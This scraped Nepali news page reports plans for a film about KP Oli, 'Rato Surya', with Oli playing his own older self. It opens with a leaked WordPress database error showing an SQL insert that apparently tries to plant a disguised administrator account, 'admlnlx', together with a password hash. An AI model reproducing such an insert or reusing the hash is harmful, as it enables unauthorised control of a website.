WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYL/1e5e/CSaBDjqwP3E.ed4Pa8sR41', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 19:39:25', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर २९–
प्रधानमन्त्रीकाल होस् या अन्य समय नेपाली जनतालाई हसाएरै दंग पारे एमाले अध्यक्ष केपी ओली । धेरैले नेता होइन कलाकारको संज्ञा दिए नेता ओलीलाई । अब नेपाली जनताले साच्चिकै ओलीलाई कलाकार देख्न सक्ने छन् ।
अध्यक्ष ओलीमाथी चलचित्र बन्ने भएपछि उनी नायकको रुपमा प्रस्तुत हुने निर्माण पक्षले जनाएको छ । ‘रातो सूर्य’ नाम राखिएको चलचित्रमा ओली आफैंले पनि नायकको भूमिका निर्वाह गर्ने भएका हुन् ।
दिपेन्द्र प्रसाद दाहालको निर्देशनमा बन्ने सो चलचित्रमा ओलीको बाल्यकालदेखि ६५ वर्षको अवधिलाई प्रस्तुत गरिने छ । निर्देशक दहालका अनुसार ओलीको १६ देखि ४५ वर्षको उमेरसम्मको भूमिका कलाकार अनुपम शर्माले निर्वाह गर्ने भएका छन् ।
४५ वर्षदेखि ६५ वर्षसम्मको भुमिकामा भने ओली आफैं देखिने भएका छन् । त्यसवाफत् ओलीलाई पारिश्रमिक समेत दिइने निर्देशक दाहालले जानकारी दिए ।
दाहाल र शर्माले बिगत पाँच वर्षदेखि ओलीको रहन सहन, लवजवारे अध्ययन गरेको जानकारी दिए ।
निर्देशक दाहालको भनाई अनुसार ओलीले १० दिन सुटिङ गर्नुपर्ने छ । उनको सबै सुटिङ काठमाडौंमै हुने छ । ‘१० दिन सुटिङको लागि ओलीसँग समय मागेको जानकारी दिँदै दाहालले ओलीले सकारात्मक प्रतिक्रिया दिएको बताए ।
आठराईबाट चलचित्रको सुटिङ सुरु हुने छ भने त्यसपछि झापा, रौतहट र मकवानपुरको थाहा नगरपालिकामा सुटिङ हुने छ । रुपचन्द्र विष्टसँग ओलीको संगत भएकाले थाह नगरपालिकामा अलि बढी सुटिङ हुने दाहालले बताए । जेल बस्दाको अवधिको दृष्य भने सेट लगाएर गर्ने योजना छ ।